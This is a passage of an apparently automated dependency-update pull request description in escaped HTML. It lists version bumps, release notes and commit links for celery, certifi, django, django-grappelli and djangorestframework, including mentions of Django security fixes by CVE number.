href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.2...v5.5.3\"\u003ehttps://github.com/celery/celery/compare/v5.5.2...v5.5.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix calculating remaining time across DST changes by \u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003esetup_logger\u003c/code\u003e from COMPAT_MODULES by \u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mongodb bullet and fix github links in contributions section by \u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.2 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9675\"\u003ecelery/celery#9675\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/imrivera\"\u003e\u003ccode\u003e@​imrivera\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9669\"\u003ecelery/celery#9669\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rconradharris\"\u003e\u003ccode\u003e@​rconradharris\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9668\"\u003ecelery/celery#9668\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jabberwock404\"\u003e\u003ccode\u003e@​jabberwock404\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9672\"\u003ecelery/celery#9672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/celery/celery/compare/v5.5.1...v5.5.2\"\u003ehttps://github.com/celery/celery/compare/v5.5.1...v5.5.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.5.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/blob/main/Changelog.rst\"\u003ecelery's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e5.5.3\u003c/h1\u003e\n\u003cp\u003e:release-date: 2025-06-01\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- make the tests run on python 3.13 for gcs backend ([#9677](https://github.com/celery/celery/issues/9677))\n- Added DeepWiki to README ([#9683](https://github.com/celery/celery/issues/9683))\n- Limit redis to \u0026lt;=v5.2.1 to match Kombu ([#9693](https://github.com/celery/celery/issues/9693))\n- Use EX_OK instead of literal zero ([#9684](https://github.com/celery/celery/issues/9684))\n- Make wheel metadata reproducible ([#9687](https://github.com/celery/celery/issues/9687))\n- let celery install from kombu dependencies for better align ([#9696](https://github.com/celery/celery/issues/9696))\n- Fix stamping documentation to clarify stamped_headers key is optional in visitor methods ([#9697](https://github.com/celery/celery/issues/9697))\n- Support apply_async without queue argument on quorum queues ([#9686](https://github.com/celery/celery/issues/9686))\n- Updated rabbitmq doc about using quorum queues with task routes ([#9707](https://github.com/celery/celery/issues/9707))\n- Add: Dumper Unit Test ([#9711](https://github.com/celery/celery/issues/9711))\n- Add unit test for event.group_from ([#9709](https://github.com/celery/celery/issues/9709))\n- refactor: add beat_cron_starting_deadline documentation warning ([#9712](https://github.com/celery/celery/issues/9712))\n- fix: resolve issue [#9569](https://github.com/celery/celery/issues/9569) by supporting distinct broker transport options for workers ([#9695](https://github.com/celery/celery/issues/9695))\n- Fixes issue with retry callback arguments in DelayedDelivery ([#9708](https://github.com/celery/celery/issues/9708))\n- get_exchange-unit-test ([#9710](https://github.com/celery/celery/issues/9710))\n- ISSUE-9704: Update documentation of result_expires, filesystem backend is supported ([#9716](https://github.com/celery/celery/issues/9716))\n- update to blacksmith ubuntu 24.04 ([#9717](https://github.com/celery/celery/issues/9717))\n- Added unit tests for celery.utils.iso8601 ([#9725](https://github.com/celery/celery/issues/9725))\n- Update introduction.rst docs ([#9728](https://github.com/celery/celery/issues/9728))\n- Prepare for release: v5.5.3 ([#9732](https://github.com/celery/celery/issues/9732))\n\u003cp\u003e.. _version-5.5.2:\u003c/p\u003e\n\u003ch1\u003e5.5.2\u003c/h1\u003e\n\u003cp\u003e:release-date: 2025-04-25\n:release-by: Tomer Nosrati\u003c/p\u003e\n\u003cp\u003eWhat's Changed\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix calculating remaining time across DST changes (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9669\"\u003e#9669\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003esetup_logger\u003c/code\u003e from COMPAT_MODULES (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9668\"\u003e#9668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix mongodb bullet and fix github links in contributions section (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9672\"\u003e#9672\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.2 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9675\"\u003e#9675\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _version-5.5.1:\u003c/p\u003e\n\u003ch1\u003e5.5.1\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/088c39c0f78b23a9cdf8d1c9e265ea64d02cfd86\"\u003e\u003ccode\u003e088c39c\u003c/code\u003e\u003c/a\u003e Prepare for release: v5.5.3 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9732\"\u003e#9732\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/0c1c52b7c361b65c286b30b13973df741799f4ea\"\u003e\u003ccode\u003e0c1c52b\u003c/code\u003e\u003c/a\u003e Update introduction.rst docs (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9728\"\u003e#9728\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/778b009ffbad7c7d8061a4e7cc4c4445ec541da3\"\u003e\u003ccode\u003e778b009\u003c/code\u003e\u003c/a\u003e Added unit tests for celery.utils.iso8601 (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9725\"\u003e#9725\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b00c1446d809b8909c4932674c49a7659838aaa6\"\u003e\u003ccode\u003eb00c144\u003c/code\u003e\u003c/a\u003e update to blacksmith ubuntu 24.04\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/5aae2ca5f455e148cd59de89907459265c5b81fc\"\u003e\u003ccode\u003e5aae2ca\u003c/code\u003e\u003c/a\u003e ISSUE-9704: Update documentation of , filesystem backend is supported if cele...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/7cf9d8987017ee6414644ff7bf32756860255d2a\"\u003e\u003ccode\u003e7cf9d89\u003c/code\u003e\u003c/a\u003e get_exchange-unit-test (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9710\"\u003e#9710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b06e53f324f0cfe2b1c98b99d7a8a158d7034dea\"\u003e\u003ccode\u003eb06e53f\u003c/code\u003e\u003c/a\u003e Fixes issue with retry callback argument types in DelayedDelivery (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9708\"\u003e#9708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/b6cab29e6932f100c9f30706ce2600ccff5e14e3\"\u003e\u003ccode\u003eb6cab29\u003c/code\u003e\u003c/a\u003e fix: resolve issue \u003ca href=\"https://redirect.github.com/celery/celery/issues/9569\"\u003e#9569\u003c/a\u003e by supporting distinct broker transport options for ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/5fc068cd4561ddddebaa5abdde947a90105fa59e\"\u003e\u003ccode\u003e5fc068c\u003c/code\u003e\u003c/a\u003e refactor: add beat_cron_starting_deadline documentation warning (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9712\"\u003e#9712\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/celery/celery/commit/c7bb67f7412c61477473299ae2f251d5731be3c1\"\u003e\u003ccode\u003ec7bb67f\u003c/code\u003e\u003c/a\u003e Add unit test for event.group_from (\u003ca href=\"https://redirect.github.com/celery/celery/issues/9709\"\u003e#9709\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/celery/celery/compare/v3.1.18...v5.5.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2015.9.6.1 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2015.09.06.1...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `django` from 1.8.5 to 4.2.22\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/7275cc5d1326fad562725ed47fbe5eb149dfa6fb\"\u003e\u003ccode\u003e7275cc5\u003c/code\u003e\u003c/a\u003e [4.2.x] Bumped version for 4.2.22 release.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/ac03c5e7df8680c61cdb0d3bdb8be9095dba841e\"\u003e\u003ccode\u003eac03c5e\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed CVE-2025-48432 -- Escaped formatting arguments in `log_response...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c62f4eeda774b10541154b9e980f5b981030c4a0\"\u003e\u003ccode\u003ec62f4ee\u003c/code\u003e\u003c/a\u003e [4.2.x] Added stub release notes and release date for 4.2.22.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c5b42632c95fdaaa46e2b9b512bf39346e21abc9\"\u003e\u003ccode\u003ec5b4263\u003c/code\u003e\u003c/a\u003e [4.2.x] Fixed \u003ca href=\"https://redirect.github.com/django/django/issues/36402\"\u003e#36402\u003c/a\u003e, Refs \u003ca href=\"https://redirect.github.com/django/django/issues/35980\"\u003e#35980\u003c/a\u003e -- Updated built package name in reusable a...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/32fd8dec5618bd09eccdeb9dbf512043193d68ef\"\u003e\u003ccode\u003e32fd8de\u003c/code\u003e\u003c/a\u003e [4.2.x] Added helpers in csrf_tests and logging_tests to assert logs from `lo...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/acbe655a0fa1200d2de31c6020f310ba9aa2f636\"\u003e\u003ccode\u003eacbe655\u003c/code\u003e\u003c/a\u003e [4.2.x] Refs \u003ca href=\"https://redirect.github.com/django/django/issues/26688\"\u003e#26688\u003c/a\u003e -- Added tests for \u003ccode\u003elog_response()\u003c/code\u003e internal helper.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/dc365cac9b48067d8fa75968fc2e9801293eecb2\"\u003e\u003ccode\u003edc365ca\u003c/code\u003e\u003c/a\u003e [4.2.x] Refs \u003ca href=\"https://redirect.github.com/django/django/issues/35980\"\u003e#35980\u003c/a\u003e -- Added release note about changes in release artifacts ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/c454afbf4c0461fd90f75391dc690b154abba6ef\"\u003e\u003ccode\u003ec454afb\u003c/code\u003e\u003c/a\u003e [4.2.x] Removed \u0026quot;Expected\u0026quot; from release date for 4.2.21.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/5b29315848450b7e7c5cdcd75096b1e172464330\"\u003e\u003ccode\u003e5b29315\u003c/code\u003e\u003c/a\u003e [4.2.x] Cleaned up CVE-2025-32873 security archive description.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/django/django/commit/0d5495850a5e4f2aca6dc908d3db2248d96750b2\"\u003e\u003ccode\u003e0d54958\u003c/code\u003e\u003c/a\u003e [4.2.x] Added CVE-2025-32873 to security archive.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/django/django/compare/1.8.5...4.2.22\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `django-grappelli` from 2.7.1 to 2.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sehmaschine/django-grappelli/blob/2.15.2/docs/changelog.rst\"\u003edjango-grappelli's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.15.2 (not yet released)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Django Autocompletes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.15.1 (April 22nd 2021)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFirst release of Grappelli which is compatible with Django 3.2.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.4 (April 15th 2021)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Redirect with switch user.\u003c/li\u003e\n\u003cli\u003eImproved: Remove extra filtering in AutocompleteLookup.\u003c/li\u003e\n\u003cli\u003eImproved: Added import statement with URLs for quickstart docs.\u003c/li\u003e\n\u003cli\u003eImproved: Added additional blocks with inlines to allow override.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.3 (Nov 24th, 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Compatibility with Django 3.1.\u003c/li\u003e\n\u003cli\u003eFixed: Docs about adding Grappelli documentation URLS.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.2 (May 14th, 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Django version (3.0) with docs and quickstart.\u003c/li\u003e\n\u003cli\u003eFixed: Dashboard with metaclass.\u003c/li\u003e\n\u003cli\u003eFixed: Missing variable in RelatedObjectLookups.\u003c/li\u003e\n\u003cli\u003eFixed: Sortables with tuples when using StackedInlines.\u003c/li\u003e\n\u003cli\u003eImproved: Removed six dependency.\u003c/li\u003e\n\u003cli\u003eImproved: Changed bodyclass in order to allow adding more attributes.\u003c/li\u003e\n\u003cli\u003eImproved: Adding Python 3.7 /3.8 to CI tests.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.1 (February 10th, 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFirst release of Grappelli which is compatible with Django 3.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.13.4 (February 10th 2020)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Select2 (Django Autocompletes) with Inlines.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.13.3 (December 27th 2019)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed: Horizontal scrolling.\u003c/li\u003e\n\u003cli\u003eFixed: Changelist with custom filters.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/4713e35834ba7027087da2ad23988448fcd1b451\"\u003e\u003ccode\u003e4713e35\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into stable/2.15.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/05ff146d8d450616f901311c488b072ced67355c\"\u003e\u003ccode\u003e05ff146\u003c/code\u003e\u003c/a\u003e constance template update, fixed \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/973\"\u003e#973\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/ac35b747b927899c5c3a0f8ed042caa4eaaff1d9\"\u003e\u003ccode\u003eac35b74\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/976\"\u003e#976\u003c/a\u003e from ksg97031/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/4ca94bcda0fa2720594506853d85e00c8212968f\"\u003e\u003ccode\u003e4ca94bc\u003c/code\u003e\u003c/a\u003e Update switch.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/4aa8d072ae880e63de96db0476a1e0a0351b76cf\"\u003e\u003ccode\u003e4aa8d07\u003c/code\u003e\u003c/a\u003e fixed pagination ellipsis, \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/974\"\u003e#974\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/55f88d661c28598d059cf81dbfd38dacb945662f\"\u003e\u003ccode\u003e55f88d6\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/972\"\u003e#972\u003c/a\u003e from dandicocco/reversion-patch\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/355414eb378503058f28f32a1a5471f5dc68c3de\"\u003e\u003ccode\u003e355414e\u003c/code\u003e\u003c/a\u003e update revision.comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/d46c4d75f7380f0baf9a6a9dece79c76468ce402\"\u003e\u003ccode\u003ed46c4d7\u003c/code\u003e\u003c/a\u003e updated changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/33a4e8a5d8854ecc76c6acd5b384181343e9c33c\"\u003e\u003ccode\u003e33a4e8a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/sehmaschine/django-grappelli/issues/969\"\u003e#969\u003c/a\u003e from maximdeclercq/stable/2.15.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sehmaschine/django-grappelli/commit/7d5dcc4d781528f12cfade0102bdc95221a7bf0c\"\u003e\u003ccode\u003e7d5dcc4\u003c/code\u003e\u003c/a\u003e fix(autocomplete): fix styling for native django autocompletion\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sehmaschine/django-grappelli/compare/2.7.1...2.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `djangorestframework` from 3.2.3 to 3.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/encode/django-rest-framework/releases\"\u003edjangorestframework's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.15.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ca href=\"https://github.com/api\"\u003e\u003ccode\u003e@​api\u003c/code\u003e\u003c/a\u003e_view example to caching documentation by \u003ca href=\"https://github.com/BradWells\"\u003e\u003ccode\u003e@​BradWells\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9131\"\u003eencode/django-rest-framework#9131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate docstring by \u003ca href=\"https://github.com/jthevos\"\u003e\u003ccode\u003e@​jthevos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9340\"\u003eencode/django-rest-framework#9340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eApply black formatting to caching markdown by \u003ca href=\"https://github.com/jthevos\"\u003e\u003ccode\u003e@​jthevos\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9341\"\u003eencode/django-rest-framework#9341\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate renderers documentation example by \u003ca href=\"https://github.com/mgaligniana\"\u003e\u003ccode\u003e@​mgaligniana\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9362\"\u003eencode/django-rest-framework#9362\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoving live examples of tutorial code that are no longer hosted by \u003ca href=\"https://github.com/TGoddessana\"\u003e\u003ccode\u003e@​TGoddessana\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9363\"\u003eencode/django-rest-framework#9363\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocs: Remove an unnecessary step from quickstart.md by \u003ca href=\"https://github.com/gogowitsch\"\u003e\u003ccode\u003e@​gogowitsch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9387\"\u003eencode/django-rest-framework#9387\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDocumentation: Add Python 3.12 to the requirements by \u003ca 